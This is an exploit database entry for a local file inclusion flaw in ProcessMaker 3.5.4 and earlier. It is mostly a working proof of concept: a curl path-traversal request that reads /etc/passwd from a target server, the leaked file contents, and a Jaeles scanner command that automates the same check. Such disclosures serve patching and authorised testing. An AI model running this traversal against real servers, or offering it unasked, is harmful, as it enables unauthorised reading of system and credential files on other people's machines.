ProcessMaker 3.5.4 – Local File inclusion

  • 作者: Ai Ho
    日期: 2021-08-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50229/
  • # Exploit Title: ProcessMaker 3.5.4 - Local File inclusion
    # Exploit Author: Ai Ho (@j3ssiejjj)
    # Date: 16-04-2021
    # Vendor Homepage: https://www.processmaker.com/
    # Version: ProcessMaker <= 3.5.4
    # References: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/process-maker-lfi.yaml
    
    # PoC:
    
    ## With curl
    
    curl -k --path-as-is 'http://targetIP/../../../..//etc/passwd'
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    
    --[snippets]--
    
    ## With Jaeles Scanner
    
    jaeles scan -s~/jaeles-signatures/common/process-maker-lfi.yaml -u http://targetIP